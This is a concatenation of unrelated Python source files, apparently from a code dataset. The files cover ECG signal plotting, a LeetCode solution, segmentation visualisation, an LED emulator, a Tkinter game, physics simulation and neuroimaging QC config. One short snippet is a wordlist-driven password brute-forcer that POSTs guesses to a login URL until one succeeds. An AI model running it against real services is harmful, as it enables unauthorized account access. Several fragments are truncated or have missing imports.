import scipy.signal as signal
from pandas import DataFrame, to_datetime
from bokeh.plotting import figure
from bokeh.layouts import column, row
from bokeh.models import ColumnDataSource, Panel
from bokeh.models.widgets import CheckboxGroup, RadioButtonGroup, PreText, Paragraph
class ProcessedData:
def __init__(self, logdata: DataFrame):
self.logdata = logdata[logdata.Name == 'ECG LL-RA CAL (mVolts)']
print(self.logdata.head(4).values)
num_frequencies = 100000
frequencies = np.linspace(0.01, 50, num_frequencies)
periodogram = signal.lombscargle(self.logdata.Timestamp, self.logdata.Value, frequencies)
self.plot_data = DataFrame(columns=['frequencies', 'power'])
self.plot_data.frequencies = frequencies
self.plot_data.power = periodogram
def tab(self, name):
fig = figure(
title='Lomb Scargle Periodogram',
plot_width=conf.PLOTWIDTH,
plot_height=conf.PLOTHEIGHT,
x_axis_label='Frequency',
y_axis_label='Power'
)
fig.line('frequencies', 'power', source=self.plot_data, line_width=2)
layout = column(Paragraph(text='Lomb Scargle Periodogram of LL-RA physio'), fig)
return Panel(child=layout, title=name)
| StarcoderdataPython |
3241965 | <gh_stars>0
from collections import defaultdict
class Solution:
"""
@param cpdomains: a list cpdomains of count-paired domains
@return: a list of count-paired domains
"""
def subdomainVisits(self, cpdomains):
counts = defaultdict(lambda: 0)
for cpdomain in cpdomains:
time, domain = cpdomain.split()
time = int(time)
sub_domains = domain.split('.')
now_domain = sub_domains[-1]
counts[now_domain] += time
for sub_domain in sub_domains[::-1][1:]:
now_domain = sub_domain + '.' + now_domain
counts[now_domain] += time
ans = []
for domain, count in counts.items():
ans.append(str(count) + ' ' + domain)
return ans
| StarcoderdataPython |
1690360 | <gh_stars>0
import requests
from sys import argv
file__ = argv[1]
data = {
'email': '<EMAIL>',
'password': <PASSWORD>
}
url = argv[2]
num = 0
with open(file__, 'r') as a_file:
for lines in a_file:
line = lines.strip()
data['password'] = line
print(str(data) + " " + str(num))
r = requests.post(url, data = data)
if r.status_code >= 400:
num += 1
pass
else:
print("THE CORRECT PASSWORD IS >>" + data['password'])
break
| StarcoderdataPython |
1685900 | <gh_stars>100-1000
import logging
import math
import re
import warnings
from pathlib import Path
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image
from matplotlib import pyplot as plt, gridspec, cm, colors
import csv
from utils.utils import unscale, unnormalize, get_key_def
from utils.geoutils import create_new_raster_from_base
import matplotlib
matplotlib.use('Agg')
logging.getLogger(__name__)
def grid_vis(input_, output, heatmaps_dict, label=None, heatmaps=True):
""" Create a grid with PIL images and titles
:param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
:param output: (tensor) output array as pytorch tensor, e.g. as returned by dataloader
:param heatmaps_dict: (dict) Dictionary of heatmaps where key is grayscale value of class and value a dict {'class_name': (str), 'heatmap_PIL': (PIL object))
:param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader (optional)
:param heatmaps: (bool) if True, include heatmaps in grid
:return: Saves .png to disk
"""
list_imgs_pil = [input_, label, output] if label is not None else [input_, output]
list_titles = ['input', 'label', 'output'] if label is not None else ['input', 'output']
num_tiles = (len(list_imgs_pil) + len(heatmaps_dict))
height = math.ceil(num_tiles/4)
width = num_tiles if num_tiles < 4 else 4
plt.figure(figsize=(width*6, height*6))
grid_spec = gridspec.GridSpec(height, width)
if heatmaps:
for key in heatmaps_dict.keys():
list_imgs_pil.append(heatmaps_dict[key]['heatmap_PIL'])
list_titles.append(heatmaps_dict[key]['class_name'])
assert len(list_imgs_pil) == len(list_titles)
for index, zipped in enumerate(zip(list_imgs_pil, list_titles)):
img, title = zipped
plt.subplot(grid_spec[index])
plt.imshow(img)
plt.grid(False)
plt.axis('off')
plt.title(title)
plt.tight_layout()
return plt
def vis_from_batch(vis_params,
inputs,
outputs,
batch_index,
vis_path,
labels=None,
dataset='',
ep_num=0,
scale=None,
debug=False):
""" Provide indiviual input, output and label from batch to visualization function
:param vis_params: (Dict) parameters useful during visualization
:param inputs: (tensor) inputs as pytorch tensors with dimensions (batch_size, channels, width, height)
:param outputs: (tensor) outputs as pytorch tensors with dimensions (batch_size, channels, width, height)
:param batch_index: (int) index of batch inside epoch
:param vis_path: path where visualisation images will be saved
:param labels: (tensor) labels as pytorch tensors with dimensions (batch_size, channels, width, height)
:param dataset: name of dataset for file naming purposes (ex. 'tst')
:param ep_num: (int) number of epoch for file naming purposes
:param debug: (bool) if True, some debug features will be activated
:return:
"""
labels = [None]*(len(outputs)) if labels is None else labels # Creaty empty list of labels to enable zip operation below if no label
for batch_samp_index, zipped in enumerate(zip(inputs, labels, outputs)):
epoch_samp_index = batch_samp_index + len(inputs) * batch_index
input_, label, output = zipped
vis(vis_params, input_, output,
vis_path=vis_path,
sample_num=epoch_samp_index+1,
label=label,
dataset=dataset,
ep_num=ep_num,
scale=scale,
debug=debug)
def vis(vis_params,
input_,
output,
vis_path,
sample_num=0,
label=None,
dataset='',
ep_num=0,
inference_input_path=None,
scale=None,
debug=False):
"""saves input, output and label (if given) as .png in a grid or as individual pngs
:param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
:param output: (tensor) output array as pytorch tensor before argmax, e.g. as returned by dataloader
:param vis_path: path where visualisation images will be saved
:param sample_num: index of sample if function is from for loop iterating through a batch or list of images.
:param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader. Optional.
:param dataset: (str) name of dataset arrays belong to. For file-naming purposes only.
:param ep_num: (int) number of epoch arrays are inputted from. For file-naming purposes only.
:param inference_input_path: (Path) path to input image on which inference is being performed. If given, turns «inference» bool to True below.
:return: saves color images from input arrays as grid or as full scale .png
"""
# TODO: Temporary fix, need to be discuss, `input_` is a list if the initial input as NIR with the RGB at [0].
# The `squeeze` fonction cut the useless dimension, append in inference.
input_ = np.squeeze(input_[0]) if type(input_) is list else np.squeeze(input_)
assert vis_path.parent.is_dir()
vis_path.mkdir(exist_ok=True)
if not vis_params[
'inference_input_path']: # FIXME: function parameters should not come in as different types if inference or not.
input_ = input_.cpu().permute(1, 2, 0).numpy() # channels last
output = F.softmax(output, dim=0) # Inference output is already softmax
output = output.detach().cpu().permute(1, 2, 0).numpy() # channels last
if label is not None:
label_copy = label.cpu().numpy().copy()
if vis_params['ignore_index'] < 0:
new_ignore_index = 255
# Convert all pixels with ignore_index values to 255 to make sure it is last in order of values.
label_copy[label_copy == vis_params['ignore_index']] = new_ignore_index
if vis_params['mean'] and vis_params['std']:
input_ = unnormalize(input_img=input_, mean=vis_params['mean'], std=vis_params['std'])
input_ = unscale(img=input_, float_range=(scale[0], scale[1]), orig_range=(0, 255)) if scale else input_
if 1 <= input_.shape[2] <= 2:
input_ = input_[:, :, :1] # take first band (will become grayscale image)
input_ = np.squeeze(input_)
elif input_.shape[2] >= 3:
input_ = input_[:, :, :3] # take three first bands assuming they are RGB in correct order
mode = 'L' if input_.shape[2] == 1 else 'RGB' # https://pillow.readthedocs.io/en/3.1.x/handbook/concepts.html#concept-modes
input_PIL = Image.fromarray(input_.astype(np.uint8), mode=mode) # TODO: test this with grayscale input.
# Give value of class to band with highest value in final inference
output_argmax = np.argmax(output, axis=2).astype(np.uint8) # Flatten along channels axis. Convert to 8bit
# Define colormap and names of classes with respect to grayscale values
classes, cmap = colormap_reader(output, vis_params['colormap_file'], default_colormap='Set1')
heatmaps_dict = heatmaps_to_dict(output, classes, inference=inference_input_path,
debug=debug) # Prepare heatmaps from softmax output
# Convert output and label, if provided, to RGB with matplotlib's colormap object
output_argmax_color = cmap(output_argmax)
output_argmax_PIL = Image.fromarray((output_argmax_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
if not inference_input_path and label is not None:
label_color = cmap(label_copy)
label_PIL = Image.fromarray((label_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
else:
label_PIL = None
if inference_input_path is not None:
if debug and len(np.unique(output_argmax)) == 1:
warnings.warn(f'Inference contains only {np.unique(output_argmax)} value. Make sure data scale '
f'{scale} is identical with scale used for training model.')
output_name = vis_path.joinpath(f"{inference_input_path.stem}_inference.tif")
create_new_raster_from_base(inference_input_path, output_name, output_argmax)
if vis_params['heatmaps_inf']:
for key in heatmaps_dict.keys():
heatmap = np.array(heatmaps_dict[key]['heatmap_PIL'])
class_name = heatmaps_dict[key]['class_name']
heatmap_name = vis_path.joinpath(f"{inference_input_path.stem}_inference_heatmap_{class_name}.tif")
create_new_raster_from_base(inference_input_path, heatmap_name, heatmap)
elif vis_params['grid']: # SAVE PIL IMAGES AS GRID
grid = grid_vis(input_PIL, output_argmax_PIL, heatmaps_dict, label=label_PIL, heatmaps=vis_params['heatmaps'])
grid.savefig(vis_path.joinpath(f'{dataset}_{sample_num:03d}_ep{ep_num:03d}.png'))
plt.close()
else: # SAVE PIL IMAGES DIRECTLY TO FILE
if not vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg').is_file():
input_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg'))
if not inference_input_path and label is not None:
label_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_label.png')) # save label
output_argmax_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_output_ep{ep_num:03d}.png'))
if vis_params['heatmaps']: # TODO: test this.
for key in heatmaps_dict.keys():
heatmap = heatmaps_dict[key]['heatmap_PIL']
class_name = heatmaps_dict[key]['class_name']
heatmap.save(vis_path.joinpath(f"{dataset}_{sample_num:03d}_output_ep{ep_num:03d}_heatmap_{class_name}.png")) # save heatmap
def heatmaps_to_dict(output, classes=[], inference=False, debug=False):
''' Store heatmap into a dictionary
:param output: softmax tensor
:return: dictionary where key is value of class and value is numpy array
'''
heatmaps_dict = {}
classes = range(output.shape[2]) if len(classes) == 0 else classes
for i in range(output.shape[2]): # for each channel (i.e. class) in output
perclass_output = output[:, :, i]
if inference: # Don't color heatmap if in inference
if debug:
logging.info(f'Heatmap class: {classes[i]}\n')
logging.info(f'List of unique values in heatmap: {np.unique(np.uint8(perclass_output * 255))}\n')
perclass_output_PIL = Image.fromarray(np.uint8(perclass_output*255))
else: # https://stackoverflow.com/questions/10965417/how-to-convert-numpy-array-to-pil-image-applying-matplotlib-colormap
perclass_output_PIL = Image.fromarray(np.uint8(cm.get_cmap('inferno')(perclass_output) * 255))
heatmaps_dict[i] = {'class_name': classes[i], 'heatmap_PIL': perclass_output_PIL}
return heatmaps_dict
def colormap_reader(output, colormap_path=None, default_colormap='Set1'):
"""
:param colormap_path: csv file (with header) containing 3 columns (input grayscale value, classes, html colors (#RRGGBB))
:return: list of classes and list of html colors to map to grayscale values associated with classes
"""
if colormap_path is not None:
assert Path(colormap_path).is_file(), f'Could not locate {colormap_path}'
input_val = []
classes_list = ['background']
html_colors = ['#000000']
with open(colormap_path, 'rt') as file:
reader = csv.reader(file)
next(reader) # Skip header
rows = list(reader)
input_val.extend([int(row[0]) for row in rows])
csv_classes = [row[1] for row in rows] # Take second element in row. Should be class name
csv_html_colors = [row[2] for row in rows] # Take third element in row. Should be hex color code
sorted_classes = [x for _, x in sorted(zip(input_val, csv_classes))] # sort according to grayscale values order
sorted_colors = [x for _, x in sorted(zip(input_val, csv_html_colors))]
for color in sorted_colors:
match = re.search(r'^#(?:[0-9a-fA-F]{3}){1,2}$', color)
assert match, f'Submitted color {color} does not match HEX color code pattern'
classes_list.extend(sorted_classes)
html_colors.extend(sorted_colors)
assert len(html_colors) == len(classes_list) >= output.shape[2], f'Not enough colors and class names for number of classes in output'
html_colors.append('white') # for ignore_index values in labels. #TODO: test this with a label containt ignore_index values
cmap = colors.ListedColormap(html_colors)
else:
classes_list = list(range(0, output.shape[2])) # TODO: since list of classes are only useful for naming each heatmap, this list could be inside the heatmaps_dict, e.g. {1: {heatmap: perclass_output_PIL, class_name: 'roads'}, ...}
cmap = cm.get_cmap(default_colormap)
return classes_list, cmap
| StarcoderdataPython |
1734445 | <gh_stars>10-100
import pandas as pd
Data = pd.read_csv('train.csv')
mean_age = Data.Age.mean()
print(Data.Age.map(lambda p: p - mean_age))
### USING APPLY() METHOD
def score(row):
row.Age = row.Age - mean_age
return row
print(Data.apply(score, axis="columns").Age) | StarcoderdataPython |
163652 | <reponame>chrisrossx/DotStar_Emulator<filename>DotStar_Emulator/emulator/send_test_data.py
from __future__ import print_function
from multiprocessing.connection import Client
import random
import os
import time
from PIL import Image
import pygame
from .vector2 import Vector2
from DotStar_Emulator.emulator import config
from DotStar_Emulator.emulator.utils import blend_color
from DotStar_Emulator.emulator.data import MappingData
class App(object):
data_type = None
def __init__(self, args):
self.args = args
self.mapping_data = MappingData()
self.grid_size = Vector2(config.get("GRID_SIZE"))
self.pixel_count = self.mapping_data.pixel_count
size = self.pixel_count * 4
# data does not include start and end bytes
self.data = bytearray(size)
self.connection = None
print("Data Type:", self.data_type)
if self.args.rate:
self.repeat_mode = "rate"
self.repeat_rate = float(self.args.rate)
print("Repeat Mode: Frequency")
print('Frequency Set:', self.repeat_rate)
else:
self.repeat_mode = "loop"
if self.args.loop:
self.range = range(int(args.loop))
print("Repeat Mode: Loop")
print("Loops Count:", args.loop)
else:
print("Repeat Mode: None, send once")
self.range = range(1)
def set(self, index, c, b, g, r):
if index is not None and index < self.pixel_count:
i = index * 4
self.data[i] = c
self.data[i+1] = b
self.data[i+2] = g
self.data[i+3] = r
def run(self):
if self.repeat_mode == "loop":
try:
for i in self.range:
self.on_loop()
except KeyboardInterrupt:
pass
elif self.repeat_mode == "rate":
rate = 1.0 / self.repeat_rate
try:
while True:
time.sleep(rate)
self.on_loop()
except KeyboardInterrupt:
pass
if self.connection:
self.connection.close()
def send(self):
if not self.connection:
if os.environ.has_key('DOTSTAR_HOST'):
host = os.environ.get('DOTSTAR_HOST')
else:
host = config.get("HOST")
if os.environ.has_key('DOTSTAR_PORT'):
port = os.environ.get('DOTSTAR_PORT')
else:
port = config.get("PORT")
self.connection = Client((host, port))
# Start
out_buffer = bytearray()
out_buffer += bytearray((0x00, 0x00, 0x00, 0x00))
out_buffer += self.data
if self.pixel_count:
footerLen = (self.pixel_count + 15) / 16
else:
footerLen = ((len(self.data) / 4) + 15) / 16
fBuf = bytearray()
for i in range(int(footerLen)):
# This is different than AdaFruit library, which uses zero's in the xfer[2] spi_ioc_transfer struct.
out_buffer.append(0xFF)
# End Frame
self.connection.send(out_buffer)
def on_loop(self):
raise NotImplementedError
# @staticmethod
def rand_color(self):
r = random.randint(0, 255)
g = random.randint(0, 255)
b = random.randint(0, 255)
return pygame.Color(r, g, b)
class RandomBlendApp(App):
data_type = "Random blend"
def fill_dummy(self):
a = self.rand_color()
r = self.rand_color()
g = self.rand_color()
b = self.rand_color()
for x in range(int(self.grid_size.x)):
for y in range(int(self.grid_size.y)):
c1 = blend_color(a, r, (x / float(self.grid_size.x)))
c2 = blend_color(g, b, (x / float(self.grid_size.x)))
c = blend_color(c1, c2, (y / float(self.grid_size.y)))
i = self.mapping_data.get(x, y)
self.set(i, 0xFF, c.b, c.g, c.r)
def on_loop(self):
self.fill_dummy()
self.send()
class RandomColorApp(App):
data_type = "Random colors"
def fill_dummy(self):
for x in range(int(self.grid_size.x)):
for y in range(int(self.grid_size.y)):
i = self.mapping_data.get(x, y)
c = self.rand_color()
self.set(i, 0xFF, c.b, c.g, c.r)
def on_loop(self):
self.fill_dummy()
self.send()
class FillApp(App):
data_type = "Fill single color"
def fill(self, b, r, g):
for index in range(self.mapping_data.pixel_count):
print(index)
self.set(index, 0xFF, b, g, r)
def on_loop(self):
fill = self.args.fill
if fill.startswith("(") and fill.endswith(")"):
try:
fill = fill[1:-1]
parts = fill.split(",")
# if len(parts) == 3:
b = int(parts[0])
g = int(parts[1])
r = int(parts[2])
except:
raise AttributeError("Could not parse color")
else:
try:
color = pygame.Color(fill)
b = color.b
r = color.r
g = color.g
except:
raise AttributeError("Could not parse color")
self.fill(b, r, g)
self.send()
class ImageApp(App):
data_type = "Image"
def on_loop(self):
filename = self.args.image
if not os.path.isfile(filename):
raise AttributeError("image file not found")
im = Image.open(filename)
rgb_im = im.convert('RGB')
width = self.grid_size.x if im.size[0] >= self.grid_size.x else im.size[0]
height = self.grid_size.y if im.size[1] >= self.grid_size.y else im.size[1]
for x in range(int(width)):
for y in range(int(height)):
r, g, b = rgb_im.getpixel((x, y))
i = self.mapping_data.get(x, y)
self.set(i, 0xFF, b, g, r)
self.send()
def start_send_test_data_app(args):
config.read_configuration()
if 'fill' in args and args.fill is not None:
FillApp(args).run()
elif 'image' in args and args.image is not None:
ImageApp(args).run()
elif 'rand' in args and args.rand is not None:
RandomColorApp(args).run()
else:
RandomBlendApp(args).run()
| StarcoderdataPython |
1623609 | from tkinter import *
from os import system
from platform import system as platform
class UIController:
def __init__(self):
self.root = Tk()
self.root.lift()
self.root.wm_attributes("-topmost", True)
self.root.after_idle(self.root.call, 'wm', 'attributes', '.', "-topmost", False)
self.root.after(1, lambda: self.root.focus_force())
if platform() == 'Darwin': # How Mac OS X is identified by Python
system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
top_frame = Frame(self.root)
top_frame.pack()
stage_name = Label(top_frame, text='第 000 關', font=("Helvetica", 16))
stage_name.pack(side=LEFT)
mid_frame = Frame(self.root)
mid_frame.pack()
canvas = Canvas(mid_frame, height=480, width=640, bg='gray')
canvas.pack()
bottom_frame = Frame(self.root)
bottom_frame.pack(fill=X)
info_message = Label(bottom_frame,
justify=LEFT,
text='遊戲說明:\n方向鍵按下去以後,會滑到底才可以決定下一個行進方向。\n遊戲目標是要移動到金色區域(出口)。')
info_message.pack(side=LEFT)
score = Label(bottom_frame,
text='Score: 0\nMoves: 0')
score.pack(side=RIGHT)
self.stage_name = stage_name
self.canvas = canvas
self.score = score
self.update_queue = []
def mainloop(self):
self.root.mainloop()
def use_canvas(self, obj, f):
"""E.g. add Item to canvas."""
f(obj, self.canvas)
def add_update(self, obj, f):
"""Update Item."""
self.update_queue.append([obj, f])
def update_all(self):
for obj, f in self.update_queue:
f(obj, self.canvas)
self.update_queue = []
def update_player_info(self, info):
self.score.config(text='Score: {}\nMoves: {}'.format(
info.get('score', 0) + info.get('current_stage_score'), info['total_keypress']))
def update_stage_info(self, level_data):
self.stage_name.config(text='第 {} 關: {}'.format(
level_data.get('level', '?'), level_data.get('title', '')))
def reset_canvas(self):
self.canvas.delete("all")
| StarcoderdataPython |
3275657 | <filename>fdm-devito-notebooks/01_vib/exer-vib/bouncing_ball.py
import numpy as np
def solver(H, C_R, dt, T, eps_v=0.01, eps_h=0.01):
"""
Simulate bouncing ball until it comes to rest. Time step dt.
h(0)=H (initial height). T: maximum simulation time.
Method: Euler-Cromer.
"""
dt = float(dt)
Nt = int(round(T/dt))
h = np.zeros(Nt+1)
v = np.zeros(Nt+1)
t = np.linspace(0, Nt*dt, Nt+1)
g = 0.81
v[0] = 0
h[0] = H
mode = 'free fall'
for n in range(Nt):
v[n+1] = v[n] - dt*g
h[n+1] = h[n] + dt*v[n+1]
if h[n+1] < eps_h:
#if abs(v[n+1]) > eps_v: # handles large dt, but is wrong
if v[n+1] < -eps_v:
# Impact
v[n+1] = -C_R*v[n+1]
h[n+1] = 0
if mode == 'impact':
# impact twice
return h[:n+2], v[:n+2], t[:n+2]
mode = 'impact'
elif abs(v[n+1]) < eps_v:
mode = 'rest'
v[n+1] = 0
h[n+1] = 0
return h[:n+2], v[:n+2], t[:n+2]
else:
mode = 'free fall'
else:
mode = 'free fall'
print '%4d v=%8.5f h=%8.5f %s' % (n, v[n+1], h[n+1], mode)
raise ValueError('T=%g is too short simulation time' % T)
import matplotlib.pyplot as plt
h, v, t = solver(
H=1, C_R=0.8, T=100, dt=0.0001, eps_v=0.01, eps_h=0.01)
plt.plot(t, h)
plt.legend('h')
plt.savefig('tmp_h.png'); plt.savefig('tmp_h.pdf')
plt.figure()
plt.plot(t, v)
plt.legend('v')
plt.savefig('tmp_v.png'); plt.savefig('tmp_v.pdf')
plt.show()
| StarcoderdataPython |
175100 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import bs4 as BeautifulSoup
import json
import os
import requests
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie1976
from colormath.color_objects import LabColor, sRGBColor
from pycolorname.utilities import PROJECT_PATH
class ColorSystem(dict):
"""
Provides an interface for a color system.
"""
def value_preprocess(self, value):
if isinstance(value, list) and len(value) == 3:
return tuple(value)
return value
def __getitem__(self, key):
return self.value_preprocess(dict.__getitem__(self, key))
def items(self):
return ((key, self.value_preprocess(val))
for key, val in dict.items(self))
def data_file(self):
modulename = self.__module__
return os.path.join(PROJECT_PATH, "data", modulename + ".json")
def load(self, filename=None, refresh=False):
"""
Try to load the data from a pre existing data file if it exists.
If the data file does not exist, refresh the data and save it in
the data file for future use.
The data file is a json file.
:param filename: The filename to save or fetch the data from.
:param refresh: Whether to force refresh the data or not
"""
filename = filename or self.data_file()
dirname = os.path.dirname(filename)
if refresh is False:
try:
data = None
with open(filename) as fp:
data = json.load(fp)
self.clear()
self.update(data)
return
except (ValueError, IOError):
# Refresh data if reading gave errors
pass
data = self.refresh()
self.clear()
self.update(data)
if not os.path.isdir(dirname):
os.makedirs(dirname)
with open(filename, 'w') as fp:
json.dump(data, fp,
sort_keys=True,
indent=2,
separators=(',', ': '))
def refresh(self):
"""
Refreshes the cached data from the URL provided for this color system.
"""
raise NotImplementedError
def request(self, *args, **kwargs):
"""
Gets the request using the `_url` and converts it into a
beautiful soup object.
:param args: The args to pass on to `requests`.
:param kwargs: The kwargs to pass on to `requests`.
"""
response = requests.request(*args, **kwargs)
return BeautifulSoup.BeautifulSoup(response.text, "html.parser")
def hex_to_rgb(self, value):
val = value
if val[0] == '#': # Remove # if it's present
val = val[1:]
# Convert to array with 3 hex values
if len(val) == 3: # Catch cases where 3 letter hex is used eg: #aaa
val = [val[i] * 2 for i in range(len(val))]
elif len(val) == 6:
val = [val[i:i+2] for i in range(0, len(val), 2)]
else:
raise ValueError("Invalid value given for hex {0}".format(value))
return tuple(int(v, 16) for v in val)
def find_closest(self, color):
"""
Find the closest color in the system to the given rgb values.
:param color: Tuple of r, g, b values (scaled to 255).
:returns: Tuple of name and rgb closest to the given color.
"""
# Find distance between colors and find name based on closest color
rgb = sRGBColor(*color)
lab = convert_color(rgb, LabColor, target_illuminant='D65')
min_diff = float("inf")
min_name, min_color = "", ()
for known_name, known_color in self.items():
known_rgb = sRGBColor(*known_color)
known_lab = convert_color(known_rgb, LabColor,
target_illuminant='D65')
diff = delta_e_cie1976(lab, known_lab)
if min_diff > diff:
min_diff = diff
min_name = known_name
min_color = known_color
return min_name, min_color
| StarcoderdataPython |
3313269 | <filename>tests/excerptexport/permission_test_helper.py
import pytest
from osmaxx.profile.models import Profile
@pytest.mark.django_db
class PermissionHelperMixin(object):
def add_email(self):
self.user.email = '<EMAIL>'
self.user.save()
def add_valid_email(self):
self.add_email()
Profile.objects.get_or_create(associated_user=self.user, unverified_email='<EMAIL>')
| StarcoderdataPython |
1681399 | #!/usr/bin/env python3
"""
Contains the QC settings dictionary for all cifti_vis scripts, as well as
a class to make access to settings easy to read.
"""
import os
import sys
import logging
from abc import ABCMeta, abstractmethod
from PIL import Image
import yaml
import ciftify.config as config
from ciftify.utils import run, TempDir, add_metaclass
class Config:
def __init__(self, mode):
self.__qc_settings = self.__read_mode(mode)
self.template_name = self.__qc_settings['TemplateFile']
self.template = self.__get_template()
self.__scene_dict = self.__get_scene_dict()
# self.__montages = self.__get_montages()
self.images = self.__get_images()
self.subtitle = self.__get_subtitle()
def get_navigation_list(self, path=''):
nav_list = [{'href': '', 'label':'View:'}]
for image in self.images:
if image.make_index:
image_path = os.path.join(path, '{}.html'.format(image.name))
nav_list.append({ 'href': image_path,
'label': image.name})
index_path = os.path.join(path, 'index.html')
nav_list.append({'href': index_path, 'label':'Index'})
return nav_list
def get_template_contents(self):
try:
with open(self.template) as template_txt:
template_contents = template_txt.read()
except:
logger.error("{} cannot be read.".format(self.template))
sys.exit(1)
if not template_contents:
logger.error("Template {} is empty".format(self.template))
sys.exit(1)
return template_contents
def __read_mode(self, mode):
logger = logging.getLogger(__name__)
ciftify_data = config.find_ciftify_global()
qc_settings = os.path.join(ciftify_data, 'qc_modes.yaml')
try:
with open(qc_settings) as qc_stream:
qc_modes = yaml.load(qc_stream, Loader=yaml.SafeLoader)
except:
logger.error("Cannot read qc_modes file: {}".format(qc_settings))
sys.exit(1)
try:
settings = qc_modes[mode]
except KeyError:
logger.error("qc_modes file {} does not define mode {}"
"".format(qc_settings, mode))
sys.exit(1)
return settings
def __get_template(self):
logger = logging.getLogger(__name__)
template_dir = config.find_scene_templates()
if not template_dir:
logger.error("Cannot find scene templates. Please ensure "
"CIFTIFY_DATA shell variable is properly set.")
sys.exit(1)
template = os.path.join(template_dir, self.template_name)
if not os.path.exists(template):
logger.error("Expected template {} does not exist at path {}. "
"Please check CIFTIFY_DATA variable is correctly "
"set.".format(self.template_name, template))
sys.exit(1)
return template
def __get_subtitle(self):
try:
subtitle = self.__qc_settings['IndexSubtitle']
except KeyError:
subtitle = None
return(subtitle)
def __get_scene_dict(self):
"""
Generates a dict to help separate the scenes that are montage only
from the scenes that appear individually on the page.
"""
scene_dict = {}
for scene_type in self.__qc_settings['scene_list']:
cur_scene = Scene(scene_type)
scene_dict[cur_scene.name] = cur_scene
return scene_dict
# def __get_montages(self):
# """
# When montages are made, scenes may be deleted from scene dict
# if they are a member of a montage but not labeled 'Keep'
# """
# montages = []
# qc_settings = self.__qc_settings
# if 'montage_list' in qc_settings.keys():
# for montage_type in qc_settings['montage_list']:
# cur_montage = Montage(montage_type, self.__scene_dict)
# montages.append(cur_montage)
# return montages
def __get_images(self):
images = []
# images.extend(self.__montages)
images.extend(self.__scene_dict.values())
images = sorted(images, key=lambda image: image.order)
return images
@add_metaclass(ABCMeta)
class QCScene:
"""
This abstract class acts as a base class for both Montage and Image so
both can be used interchangeably in ciftify-vis scripts.
"""
_attributes = {}
name = ''
path = ''
make_index = False
order = 0
def _get_attribute(self, key, manditory = True):
logger = logging.getLogger(__name__)
try:
attribute = self._attributes[key]
except KeyError:
if manditory:
logger.error("Scene {} does not contain the key {}. " \
"Exiting".format(self._attributes, key))
sys.exit(1)
attribute = None
return attribute
@abstractmethod
def make_image(self, output_path, scene_file):
pass
class Scene(QCScene):
def __init__(self, attributes):
self._attributes = attributes
self.name = self._get_attribute('Name')
self.make_index = self._get_attribute('MakeIndex')
self.index = self._get_attribute('Idx')
self.split_horizontal = self._get_attribute('SplitHorizontal')
self.save_image = self._get_attribute('Keep')
self.order = self._get_attribute('Order')
self.index_title = self._get_attribute('IndexTitle', manditory = False)
self.subject_title = self._get_attribute('PreTitle', manditory = False)
self.width = self.__get_width()
self.height = self.__get_height()
def make_image(self, output_loc, scene_file, logging='WARNING'):
if self.split_horizontal:
self.path = self.__split(output_loc, scene_file, logging, self.width,
self.height)
return
self.__show_scene(output_loc, scene_file, logging, self.width, self.height)
self.path = output_loc
def __get_width(self):
width = self._get_attribute('Width', manditory = False)
if not width: width = 600
return width
def __get_height(self):
height = self._get_attribute('Height', manditory = False)
if not height: height = 400
return height
def __show_scene(self, output, scene_file, logging, width, height):
run(['wb_command', '-logging', logging, '-show-scene',
scene_file, str(self.index), output, str(width), str(height)])
def __split(self, output_loc, scene_file, logging, width, height):
with TempDir() as tmp_dir:
tmp_img = os.path.join(tmp_dir, "scene{}.png".format(self.index))
self.__show_scene(tmp_img, scene_file, logging, width, height)
with Image.open(tmp_img) as img:
half_the_height = height // 2
img_top = img.crop((0, 0, width, half_the_height))
img_btm = img.crop((0, half_the_height, width, height))
im2 = Image.new('RGBA', (int(width*2), half_the_height))
im2.paste(img_top, (0, 0))
im2.paste(img_btm, (width, 0))
im2.save(output_loc)
return output_loc
def __repr__(self):
return "<ciftify.qc_config.Scene({})>".format(self.name)
def __str__(self):
return self.name
# class Montage(QCScene):
# def __init__(self, attributes, scene_dict):
# self._attributes = attributes
# self.name = self._get_attribute('Name')
# self.pics = self._get_attribute('Pics')
# self.layout = self._get_attribute('Layout')
# self.make_index = self._get_attribute('MakeIndex')
# self.scenes = self.__get_scenes(scene_dict)
# self.order = self._get_attribute('Order')
#
# def __get_scenes(self, scene_dict):
# """
# This method will delete scenes from scene_dict if any are included in
# the montage but not labeled 'Keep'.
# """
# scenes = []
# for pic in self.pics:
# scene = scene_dict[pic]
# if not scene.save_image:
# del scene_dict[pic]
# scenes.append(scene)
# return scenes
#
# def make_image(self, output_loc, scene_file, logging='WARNING', width=600,
# height=400):
# montage_cmd=['montage', '-mode', 'concatenate', '-tile',
# self.layout]
# with TempDir() as tmp_dir:
# for scene in self.scenes:
# tmp_path = os.path.join(tmp_dir, "{}.png".format(scene.name))
# scene.make_image(tmp_path, scene_file, logging, width, height)
# montage_cmd.append(tmp_path)
# montage_cmd.append(output_loc)
# run(montage_cmd)
# self.path = output_loc
#
# def __repr__(self):
# return "<ciftify.qc_config.Montage({})>".format(self.name)
#
# def __str__(self):
# return self.name
def replace_path_references(template_contents, template_prefix, path, scene_file):
''' replace refence to a file in a template scene_file in three ways
absolute path, relative path and basename
'''
path = os.path.realpath(path)
txt = template_contents.replace('{}_ABSPATH'.format(template_prefix),
path)
txt = txt.replace('{}_RELPATH'.format(template_prefix),
os.path.relpath(path,
os.path.dirname(scene_file)))
return txt
def replace_all_references(template_contents, template_prefix, path, scene_file):
''' replaces all three references to a file in the scene template '''
txt = replace_path_references(template_contents, template_prefix,
path, scene_file)
txt = txt.replace('{}_BASE'.format(template_prefix),
os.path.basename(path))
return txt
| StarcoderdataPython |
3382124 | <reponame>wonkalous/dotfiles
import subprocess
import json
import time
import sys
import re
def get_tree():
j_ = subprocess.check_output(
["i3-msg", "-t", "get_tree"]
)
j = json.loads(j_)
return j
def get_wins():
